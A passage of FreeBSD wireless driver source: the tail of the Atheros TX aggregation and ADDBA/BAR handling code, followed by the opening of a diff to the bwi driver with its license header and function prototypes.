sc->sc_ac2q[tid->ac]; struct ieee80211_tx_ampdu *tap; ATH_AGGR_STATUS status; ath_bufhead bf_q; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d\n", __func__, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* * XXX TODO: If we're called for a queue that we're leaking frames to, * ensure we only leak one. */ tap = ath_tx_get_tx_tid(an, tid->tid); if (tid->tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: called for TID=NONQOS_TID?\n", __func__); for (;;) { status = ATH_AGGR_DONE; /* * If the upper layer has paused the TID, don't * queue any further packets. * * This can also occur from the completion task because * of packet loss; but as its serialised with this code, * it won't "appear" half way through queuing packets. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) break; bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } /* * If the packet doesn't fall within the BAW (eg a NULL * data frame), schedule it directly; continue. */ if (! bf->bf_state.bfs_dobaw) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: non-baw packet\n", __func__); ATH_TID_REMOVE(tid, bf, bf_list); if (bf->bf_state.bfs_nframes > 1) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: aggr=%d, nframes=%d\n", __func__, bf->bf_state.bfs_aggr, bf->bf_state.bfs_nframes); /* * This shouldn't happen - such frames shouldn't * ever have been queued as an aggregate in the * first place. However, make sure the fields * are correctly setup just to be totally sure. */ bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_nframes = 1; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); sc->sc_aggr_stats.aggr_nonbaw_pkt++; /* Queue the packet; continue */ goto queuepkt; } TAILQ_INIT(&bf_q); /* * Do a rate control lookup on the first frame in the * list. The rate control code needs that to occur * before it can determine whether to TX. * It's inaccurate because the rate control code doesn't * really "do" aggregate lookups, so it only considers * the size of the first frame. */ ath_tx_do_ratelookup(sc, bf); bf->bf_state.bfs_rc[3].rix = 0; bf->bf_state.bfs_rc[3].tries = 0; ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); status = ath_tx_form_aggr(sc, an, tid, &bf_q); DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: ath_tx_form_aggr() status=%d\n", __func__, status); /* * No frames to be picked up - out of BAW */ if (TAILQ_EMPTY(&bf_q)) break; /* * This assumes that the descriptor list in the ath_bufhead * are already linked together via bf_next pointers. */ bf = TAILQ_FIRST(&bf_q); if (status == ATH_AGGR_8K_LIMITED) sc->sc_aggr_stats.aggr_rts_aggr_limited++; /* * If it's the only frame send as non-aggregate * assume that ath_tx_form_aggr() has checked * whether it's in the BAW and added it appropriately. */ if (bf->bf_state.bfs_nframes == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: single-frame aggregate\n", __func__); /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); bf->bf_state.bfs_aggr = 0; bf->bf_state.bfs_ndelim = 0; ath_tx_setds(sc, bf); ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); if (status == ATH_AGGR_BAW_CLOSED) sc->sc_aggr_stats.aggr_baw_closed_single_pkt++; else sc->sc_aggr_stats.aggr_single_pkt++; } else { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: multi-frame aggregate: %d frames, " "length %d\n", __func__, bf->bf_state.bfs_nframes, bf->bf_state.bfs_al); bf->bf_state.bfs_aggr = 1; sc->sc_aggr_stats.aggr_pkts[bf->bf_state.bfs_nframes]++; sc->sc_aggr_stats.aggr_aggr_pkt++; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* * Calculate the duration/protection as required. */ ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); /* * Update the rate and rtscts information based on the * rate decision made by the rate control code; * the first frame in the aggregate needs it. */ ath_tx_set_rtscts(sc, bf); /* * Setup the relevant descriptor fields * for aggregation. The first descriptor * already points to the rest in the chain. */ ath_tx_setds_11n(sc, bf); } queuepkt: /* Set completion handler, multi-frame aggregate or not */ bf->bf_comp = ath_tx_aggr_comp; if (bf->bf_state.bfs_tid == IEEE80211_NONQOS_TID) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: TID=16?\n", __func__); /* * Update leak count and frame config if were leaking frames. * * XXX TODO: it should update all frames in an aggregate * correctly! */ ath_tx_leak_count_update(sc, tid, bf); /* Punt to txq */ ath_tx_handoff(sc, txq, bf); /* Track outstanding buffer count to hardware */ /* aggregates are "one" buffer */ tid->hwq_depth++; /* * Break out if ath_tx_form_aggr() indicated * there can't be any further progress (eg BAW is full.) * Checking for an empty txq is done above. * * XXX locking on txq here? */ /* XXX TXQ locking */ if (txq->axq_aggr_depth >= sc->sc_hwq_limit_aggr || (status == ATH_AGGR_BAW_CLOSED || status == ATH_AGGR_LEAK_CLOSED)) break; } } /* * Schedule some packets from the given node/TID to the hardware. * * XXX TODO: this routine doesn't enforce the maximum TXQ depth. * It just dumps frames into the TXQ. We should limit how deep * the transmit queue can grow for frames dispatched to the given * TXQ. * * To avoid locking issues, either we need to own the TXQ lock * at this point, or we need to pass in the maximum frame count * from the caller. */ void ath_tx_tid_hw_queue_norm(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid) { struct ath_buf *bf; struct ath_txq *txq = sc->sc_ac2q[tid->ac]; DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: node %p: TID %d: called\n", __func__, an, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* Check - is AMPDU pending or running? then print out something */ if (ath_tx_ampdu_pending(sc, an, tid->tid)) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ampdu pending?\n", __func__, tid->tid); if (ath_tx_ampdu_running(sc, an, tid->tid)) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, ampdu running?\n", __func__, tid->tid); for (;;) { /* * If the upper layers have paused the TID, don't * queue any further packets. * * XXX if we are leaking frames, make sure we decrement * that counter _and_ we continue here. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) break; bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } ATH_TID_REMOVE(tid, bf, bf_list); /* Sanity check! */ if (tid->tid != bf->bf_state.bfs_tid) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bfs_tid %d !=" " tid %d\n", __func__, bf->bf_state.bfs_tid, tid->tid); } /* Normal completion handler */ bf->bf_comp = ath_tx_normal_comp; /* * Override this for now, until the non-aggregate * completion handler correctly handles software retransmits. */ bf->bf_state.bfs_txflags |= HAL_TXDESC_CLRDMASK; /* Update CLRDMASK just before this frame is queued */ ath_tx_update_clrdmask(sc, tid, bf); /* Program descriptors + rate control */ ath_tx_do_ratelookup(sc, bf); ath_tx_calc_duration(sc, bf); ath_tx_calc_protection(sc, bf); ath_tx_set_rtscts(sc, bf); ath_tx_rate_fill_rcflags(sc, bf); ath_tx_setds(sc, bf); /* * Update the current leak count if * we're leaking frames; and set the * MORE flag as appropriate. */ ath_tx_leak_count_update(sc, tid, bf); /* Track outstanding buffer count to hardware */ /* aggregates are "one" buffer */ tid->hwq_depth++; /* Punt to hardware or software txq */ ath_tx_handoff(sc, txq, bf); } } /* * Schedule some packets to the given hardware queue. * * This function walks the list of TIDs (ie, ath_node TIDs * with queued traffic) and attempts to schedule traffic * from them. * * TID scheduling is implemented as a FIFO, with TIDs being * added to the end of the queue after some frames have been * scheduled. */ void ath_txq_sched(struct ath_softc *sc, struct ath_txq *txq) { struct ath_tid *tid, *next, *last; ATH_TX_LOCK_ASSERT(sc); /* * Don't schedule if the hardware queue is busy. * This (hopefully) gives some more time to aggregate * some packets in the aggregation queue. * * XXX It doesn't stop a parallel sender from sneaking * in transmitting a frame! */ /* XXX TXQ locking */ if (txq->axq_aggr_depth + txq->fifo.axq_depth >= sc->sc_hwq_limit_aggr) { sc->sc_aggr_stats.aggr_sched_nopkt++; return; } if (txq->axq_depth >= sc->sc_hwq_limit_nonaggr) { sc->sc_aggr_stats.aggr_sched_nopkt++; return; } last = TAILQ_LAST(&txq->axq_tidq, axq_t_s); TAILQ_FOREACH_SAFE(tid, &txq->axq_tidq, axq_qelem, next) { /* * Suspend paused queues here; they'll be resumed * once the addba completes or times out. */ DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: tid=%d, paused=%d\n", __func__, tid->tid, tid->paused); ath_tx_tid_unsched(sc, tid); /* * This node may be in power-save and we're leaking * a frame; be careful. */ if (! ath_tx_tid_can_tx_or_sched(sc, tid)) { continue; } if (ath_tx_ampdu_running(sc, tid->an, tid->tid)) ath_tx_tid_hw_queue_aggr(sc, tid->an, tid); else ath_tx_tid_hw_queue_norm(sc, tid->an, tid); /* Not empty? Re-schedule */ if (tid->axq_depth != 0) ath_tx_tid_sched(sc, tid); /* * Give the software queue time to aggregate more * packets. If we aren't running aggregation then * we should still limit the hardware queue depth. */ /* XXX TXQ locking */ if (txq->axq_aggr_depth + txq->fifo.axq_depth >= sc->sc_hwq_limit_aggr) { break; } if (txq->axq_depth >= sc->sc_hwq_limit_nonaggr) { break; } /* * If this was the last entry on the original list, stop. * Otherwise nodes that have been rescheduled onto the end * of the TID FIFO list will just keep being rescheduled. * * XXX What should we do about nodes that were paused * but are pending a leaking frame in response to a ps-poll? * They'll be put at the front of the list; so they'll * prematurely trigger this condition! Ew. */ if (tid == last) break; } } /* * TX addba handling */ /* * Return net80211 TID struct pointer, or NULL for none */ struct ieee80211_tx_ampdu * ath_tx_get_tx_tid(struct ath_node *an, int tid) { struct ieee80211_node *ni = &an->an_node; struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return NULL; tap = &ni->ni_tx_ampdu[tid]; return tap; } /* * Is AMPDU-TX running? */ static int ath_tx_ampdu_running(struct ath_softc *sc, struct ath_node *an, int tid) { struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return 0; tap = ath_tx_get_tx_tid(an, tid); if (tap == NULL) return 0; /* Not valid; default to not running */ return !! (tap->txa_flags & IEEE80211_AGGR_RUNNING); } /* * Is AMPDU-TX negotiation pending? */ static int ath_tx_ampdu_pending(struct ath_softc *sc, struct ath_node *an, int tid) { struct ieee80211_tx_ampdu *tap; if (tid == IEEE80211_NONQOS_TID) return 0; tap = ath_tx_get_tx_tid(an, tid); if (tap == NULL) return 0; /* Not valid; default to not pending */ return !! (tap->txa_flags & IEEE80211_AGGR_XCHGPEND); } /* * Is AMPDU-TX pending for the given TID? */ /* * Method to handle sending an ADDBA request. * * We tap this so the relevant flags can be set to pause the TID * whilst waiting for the response. * * XXX there's no timeout handler we can override? */ int ath_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; /* * XXX danger Will Robinson! * * Although the taskqueue may be running and scheduling some more * packets, these should all be _before_ the addba sequence number. * However, net80211 will keep self-assigning sequence numbers * until addba has been negotiated. * * In the past, these packets would be "paused" (which still works * fine, as they're being scheduled to the driver in the same * serialised method which is calling the addba request routine) * and when the aggregation session begins, they'll be dequeued * as aggregate packets and added to the BAW. However, now there's * a "bf->bf_state.bfs_dobaw" flag, and this isn't set for these * packets. Thus they never get included in the BAW tracking and * this can cause the initial burst of packets after the addba * negotiation to "hang", as they quickly fall outside the BAW. * * The "eventual" solution should be to tag these packets with * dobaw. Although net80211 has given us a sequence number, * it'll be "after" the left edge of the BAW and thus it'll * fall within it. */ ATH_TX_LOCK(sc); /* * This is a bit annoying. Until net80211 HT code inherits some * (any) locking, we may have this called in parallel BUT only * one response/timeout will be called. Grr. */ if (atid->addba_tx_pending == 0) { ath_tx_tid_pause(sc, atid); atid->addba_tx_pending = 1; } ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called; dialogtoken=%d, baparamset=%d, batimeout=%d\n", __func__, ni->ni_macaddr, ":", dialogtoken, baparamset, batimeout); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: txa_start=%d, ni_txseqs=%d\n", __func__, tap->txa_start, ni->ni_txseqs[tid]); return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } /* * Handle an ADDBA response. * * We unpause the queue so TX'ing can resume. * * Any packets TX'ed from this point should be "aggregate" (whether * aggregate or not) so the BAW is updated. * * Note! net80211 keeps self-assigning sequence numbers until * ampdu is negotiated. This means the initially-negotiated BAW left * edge won't match the ni->ni_txseq. * * So, being very dirty, the BAW left edge is "slid" here to match * ni->ni_txseq. * * What likely SHOULD happen is that all packets subsequent to the * addba request should be tagged as aggregate and queued as non-aggregate * frames; thus updating the BAW. For now though, I'll just slide the * window. */ int ath_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int status, int code, int batimeout) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; int r; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called; status=%d, code=%d, batimeout=%d\n", __func__, ni->ni_macaddr, ":", status, code, batimeout); DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: txa_start=%d, ni_txseqs=%d\n", __func__, tap->txa_start, ni->ni_txseqs[tid]); /* * Call this first, so the interface flags get updated * before the TID is unpaused. Otherwise a race condition * exists where the unpaused TID still doesn't yet have * IEEE80211_AGGR_RUNNING set. */ r = sc->sc_addba_response(ni, tap, status, code, batimeout); ATH_TX_LOCK(sc); atid->addba_tx_pending = 0; /* * XXX dirty! * Slide the BAW left edge to wherever net80211 left it for us. * Read above for more information. */ tap->txa_start = ni->ni_txseqs[tid]; ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); return r; } /* * Stop ADDBA on a queue. * * This can be called whilst BAR TX is currently active on the queue, * so make sure this is unblocked before continuing. */ void ath_addba_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; ath_bufhead bf_cq; struct ath_buf *bf; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: called\n", __func__, ni->ni_macaddr, ":"); /* * Pause TID traffic early, so there aren't any races * Unblock the pending BAR held traffic, if it's currently paused. */ ATH_TX_LOCK(sc); ath_tx_tid_pause(sc, atid); if (atid->bar_wait) { /* * bar_unsuspend() expects bar_tx == 1, as it should be * called from the TX completion path. This quietens * the warning. It's cleared for us anyway. */ atid->bar_tx = 1; ath_tx_tid_bar_unsuspend(sc, atid); } ATH_TX_UNLOCK(sc); /* There's no need to hold the TXQ lock here */ sc->sc_addba_stop(ni, tap); /* * ath_tx_tid_cleanup will resume the TID if possible, otherwise * it'll set the cleanup flag, and it'll be unpaused once * things have been cleaned up. */ TAILQ_INIT(&bf_cq); ATH_TX_LOCK(sc); ath_tx_tid_cleanup(sc, an, tid, &bf_cq); /* * Unpause the TID if no cleanup is required. */ if (! atid->cleanup_inprogress) ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); /* Handle completing frames and fail them */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 1); } } /* * Handle a node reassociation. * * We may have a bunch of frames queued to the hardware; those need * to be marked as cleanup. */ void ath_tx_node_reassoc(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *tid; int i; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_TX_UNLOCK_ASSERT(sc); ATH_TX_LOCK(sc); for (i = 0; i < IEEE80211_TID_SIZE; i++) { tid = &an->an_tid[i]; if (tid->hwq_depth == 0) continue; ath_tx_tid_pause(sc, tid); DPRINTF(sc, ATH_DEBUG_NODE, "%s: %6D: TID %d: cleaning up TID\n", __func__, an->an_node.ni_macaddr, ":", i); ath_tx_tid_cleanup(sc, an, i, &bf_cq); /* * Unpause the TID if no cleanup is required. */ if (! tid->cleanup_inprogress) ath_tx_tid_resume(sc, tid); } ATH_TX_UNLOCK(sc); /* Handle completing frames and fail them */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 1); } } /* * Note: net80211 bar_timeout() doesn't call this function on BAR failure; * it simply tears down the aggregation session. Ew. * * It however will call ieee80211_ampdu_stop() which will call * ic->ic_addba_stop(). * * XXX This uses a hard-coded max BAR count value; the whole * XXX BAR TX success or failure should be better handled! */ void ath_bar_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int status) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; int attempts = tap->txa_attempts; DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: called; txa_tid=%d, atid->tid=%d, status=%d, attempts=%d\n", __func__, ni->ni_macaddr, ":", tap->txa_tid, atid->tid, status, attempts); /* Note: This may update the BAW details */ sc->sc_bar_response(ni, tap, status); /* Unpause the TID */ /* * XXX if this is attempt=50, the TID will be downgraded * XXX to a non-aggregate session. So we must unpause the * XXX TID here or it'll never be done. * * Also, don't call it if bar_tx/bar_wait are 0; something * has beaten us to the punch? (XXX figure out what?) */ if (status == 0 || attempts == 50) { ATH_TX_LOCK(sc); if (atid->bar_tx == 0 || atid->bar_wait == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: huh? bar_tx=%d, bar_wait=%d\n", __func__, atid->bar_tx, atid->bar_wait); else ath_tx_tid_bar_unsuspend(sc, atid); ATH_TX_UNLOCK(sc); } } /* * This is called whenever the pending ADDBA request times out. * Unpause and reschedule the TID. */ void ath_addba_response_timeout(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct ath_softc *sc = ni->ni_ic->ic_ifp->if_softc; int tid = tap->txa_tid; struct ath_node *an = ATH_NODE(ni); struct ath_tid *atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: %6D: TID=%d, called; resuming\n", __func__, ni->ni_macaddr, ":", tid); ATH_TX_LOCK(sc); atid->addba_tx_pending = 0; ATH_TX_UNLOCK(sc); /* Note: This updates the aggregate state to (again) pending */ sc->sc_addba_response_timeout(ni, tap); /* Unpause the TID; which reschedules it */ ATH_TX_LOCK(sc); ath_tx_tid_resume(sc, atid); ATH_TX_UNLOCK(sc); } /* * Check if a node is asleep or not. */ int ath_tx_node_is_asleep(struct ath_softc *sc, struct ath_node *an) { ATH_TX_LOCK_ASSERT(sc); return (an->an_is_powersave); } /* * Mark a node as currently "in powersaving." * This suspends all traffic on the node. * * This must be called with the node/tx locks free. * * XXX TODO: the locking silliness below is due to how the node * locking currently works. Right now, the node lock is grabbed * to do rate control lookups and these are done with the TX * queue lock held. This means the node lock can't be grabbed * first here or a LOR will occur. * * Eventually (hopefully!) the TX path code will only grab * the TXQ lock when transmitting and the ath_node lock when * doing node/TID operations. There are other complications - * the sched/unsched operations involve walking the per-txq * 'active tid' list and this requires both locks to be held. */ void ath_tx_node_sleep(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *atid; struct ath_txq *txq; int tid; ATH_TX_UNLOCK_ASSERT(sc); /* Suspend all traffic on the node */ ATH_TX_LOCK(sc); if (an->an_is_powersave) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: %6D: node was already asleep!\n", __func__, an->an_node.ni_macaddr, ":"); ATH_TX_UNLOCK(sc); return; } for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { atid = &an->an_tid[tid]; txq = sc->sc_ac2q[atid->ac]; ath_tx_tid_pause(sc, atid); } /* Mark node as in powersaving */ an->an_is_powersave = 1; ATH_TX_UNLOCK(sc); } /* * Mark a node as currently "awake." * This resumes all traffic to the node. */ void ath_tx_node_wakeup(struct ath_softc *sc, struct ath_node *an) { struct ath_tid *atid; struct ath_txq *txq; int tid; ATH_TX_UNLOCK_ASSERT(sc); ATH_TX_LOCK(sc); /* !? */ if (an->an_is_powersave == 0) { ATH_TX_UNLOCK(sc); DPRINTF(sc, ATH_DEBUG_XMIT, "%s: an=%p: node was already awake\n", __func__, an); return; } /* Mark node as awake */ an->an_is_powersave = 0; /* * Clear any pending leaked frame requests */ an->an_leak_count = 0; for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { atid = &an->an_tid[tid]; txq = sc->sc_ac2q[atid->ac]; ath_tx_tid_resume(sc, atid); } ATH_TX_UNLOCK(sc); } static int ath_legacy_dma_txsetup(struct ath_softc *sc) { /* nothing new needed */ return (0); } static int ath_legacy_dma_txteardown(struct ath_softc *sc) { /* nothing new needed */ return (0); } void ath_xmit_setup_legacy(struct ath_softc *sc) { /* * For now, just set the descriptor length to sizeof(ath_desc); * worry about extracting the real length out of the HAL later. */ sc->sc_tx_desclen = sizeof(struct ath_desc); sc->sc_tx_statuslen = sizeof(struct ath_desc); sc->sc_tx_nmaps = 1; /* only one buffer per TX desc */ sc->sc_tx.xmit_setup = ath_legacy_dma_txsetup; sc->sc_tx.xmit_teardown = ath_legacy_dma_txteardown; sc->sc_tx.xmit_attach_comp_func = ath_legacy_attach_comp_func; sc->sc_tx.xmit_dma_restart = ath_legacy_tx_dma_restart; sc->sc_tx.xmit_handoff = ath_legacy_xmit_handoff; sc->sc_tx.xmit_drain = ath_legacy_tx_drain; } diff --git a/sys/dev/bwi/if_bwi.c b/sys/dev/bwi/if_bwi.c index c43eed786778..ca9612e93436 100644 --- a/sys/dev/bwi/if_bwi.c +++ b/sys/dev/bwi/if_bwi.c @@ -1,4057 +1,4057 @@ /* * Copyright (c) 2007 The DragonFly Project. All rights reserved. * * This code is derived from software contributed to The DragonFly Project * by Sepherosa Ziehau * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * 3. Neither the name of The DragonFly Project nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific, prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $DragonFly: src/sys/dev/netif/bwi/if_bwi.c,v 1.19 2008/02/15 11:15:38 sephe Exp $ */ #include __FBSDID("$FreeBSD$"); #include "opt_inet.h" #include "opt_bwi.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #endif #include #include #include #include #include #include #include #include struct bwi_clock_freq { u_int clkfreq_min; u_int clkfreq_max; }; struct bwi_myaddr_bssid { uint8_t myaddr[IEEE80211_ADDR_LEN]; uint8_t bssid[IEEE80211_ADDR_LEN]; } __packed; static struct ieee80211vap *bwi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void bwi_vap_delete(struct ieee80211vap *); static void bwi_init(void *); static int bwi_ioctl(struct ifnet *, u_long, caddr_t); static void bwi_start(struct ifnet *); static void bwi_start_locked(struct ifnet *); static int bwi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void bwi_watchdog(void *); static void bwi_scan_start(struct ieee80211com *); static void bwi_set_channel(struct ieee80211com *); static void bwi_scan_end(struct ieee80211com *); static int bwi_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void bwi_updateslot(struct ifnet *); static int bwi_media_change(struct ifnet *); static void bwi_calibrate(void *); static int bwi_calc_rssi(struct bwi_softc *, const struct bwi_rxbuf_hdr *); static int bwi_calc_noise(struct bwi_softc *); static __inline uint8_t bwi_plcp2rate(uint32_t, enum ieee80211_phytype); static void bwi_rx_radiotap(struct bwi_softc *, struct mbuf *, struct bwi_rxbuf_hdr *, const void *, int, int, int); static void bwi_restart(void *, int); static void bwi_init_statechg(struct bwi_softc *, int); static void bwi_stop(struct bwi_softc *, int); static void bwi_stop_locked(struct bwi_softc *, int); static int bwi_newbuf(struct bwi_softc *, int, int); static int bwi_encap(struct bwi_softc *, int, struct mbuf *, struct ieee80211_node *); static int bwi_encap_raw(struct bwi_softc *, int, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static void bwi_init_rxdesc_ring32(struct bwi_softc *, uint32_t, bus_addr_t, int, int); static void bwi_reset_rx_ring32(struct bwi_softc *, uint32_t); static int bwi_init_tx_ring32(struct bwi_softc *, int); static int bwi_init_rx_ring32(struct bwi_softc *); static int bwi_init_txstats32(struct bwi_softc *); static void bwi_free_tx_ring32(struct bwi_softc *, int); static void bwi_free_rx_ring32(struct bwi_softc *); static void bwi_free_txstats32(struct bwi_softc *); static void bwi_setup_rx_desc32(struct bwi_softc *, int, bus_addr_t, int); static void bwi_setup_tx_desc32(struct bwi_softc *, struct bwi_ring_data *, int, bus_addr_t, int); static int bwi_rxeof32(struct bwi_softc *); static void bwi_start_tx32(struct bwi_softc *, uint32_t, int); static void bwi_txeof_status32(struct bwi_softc *); static int bwi_init_tx_ring64(struct bwi_softc *, int); static int bwi_init_rx_ring64(struct bwi_softc *); static int bwi_init_txstats64(struct bwi_softc *); static void bwi_free_tx_ring64(struct bwi_softc *, int); static void bwi_free_rx_ring64(struct bwi_softc *); static void bwi_free_txstats64(struct bwi_softc *); static void bwi_setup_rx_desc64(struct bwi_softc *, int, bus_addr_t, int); static void bwi_setup_tx_desc64(struct bwi_softc *, struct bwi_ring_data *, int, bus_addr_t, int); static int bwi_rxeof64(struct bwi_softc *); static void bwi_start_tx64(struct bwi_softc *, uint32_t, int); static void bwi_txeof_status64(struct bwi_softc *); static int bwi_rxeof(struct bwi_softc *, int); static void _bwi_txeof(struct bwi_softc *, uint16_t, int, int); static void bwi_txeof(struct bwi_softc *); static void bwi_txeof_status(struct bwi_softc *, int); static void bwi_enable_intrs(struct bwi_softc *, uint32_t); static void bwi_disable_intrs(struct bwi_softc *, uint32_t); static int bwi_dma_alloc(struct bwi_softc *); static void bwi_dma_free(struct bwi_softc *); static int bwi_dma_ring_alloc(struct bwi_softc *, bus_dma_tag_t, struct bwi_ring_data *, bus_size_t, uint32_t); static int bwi_dma_mbuf_create(struct bwi_softc *); static void bwi_dma_mbuf_destroy(struct bwi_softc *, int, int); static int bwi_dma_txstats_alloc(struct bwi_softc *, uint32_t, bus_size_t); static void bwi_dma_txstats_free(struct bwi_softc *); static void bwi_dma_ring_addr(void *, bus_dma_segment_t *, int, int); static void bwi_dma_buf_addr(void *, bus_dma_segment_t *, int, bus_size_t, int); static void bwi_power_on(struct bwi_softc *, int); static int bwi_power_off(struct bwi_softc *, int); static int bwi_set_clock_mode(struct bwi_softc *, enum bwi_clock_mode); static int bwi_set_clock_delay(struct bwi_softc *); static void bwi_get_clock_freq(struct bwi_softc *, struct bwi_clock_freq *); static int bwi_get_pwron_delay(struct bwi_softc *sc); static void bwi_set_addr_filter(struct bwi_softc *, uint16_t, const uint8_t *); static void bwi_set_bssid(struct bwi_softc *, const uint8_t *); static void bwi_get_card_flags(struct bwi_softc *); static void bwi_get_eaddr(struct bwi_softc *, uint16_t, uint8_t *); static int bwi_bus_attach(struct bwi_softc *); static int bwi_bbp_attach(struct bwi_softc *); static int bwi_bbp_power_on(struct bwi_softc *, enum bwi_clock_mode); static void bwi_bbp_power_off(struct bwi_softc *); static const char *bwi_regwin_name(const struct bwi_regwin *); static uint32_t bwi_regwin_disable_bits(struct bwi_softc *); static void bwi_regwin_info(struct bwi_softc *, uint16_t *, uint8_t *); static int bwi_regwin_select(struct bwi_softc *, int); static void bwi_led_attach(struct bwi_softc *); static void bwi_led_newstate(struct bwi_softc *, enum ieee80211_state); static void bwi_led_event(struct bwi_softc *, int); static void bwi_led_blink_start(struct bwi_softc *, int, int); static void 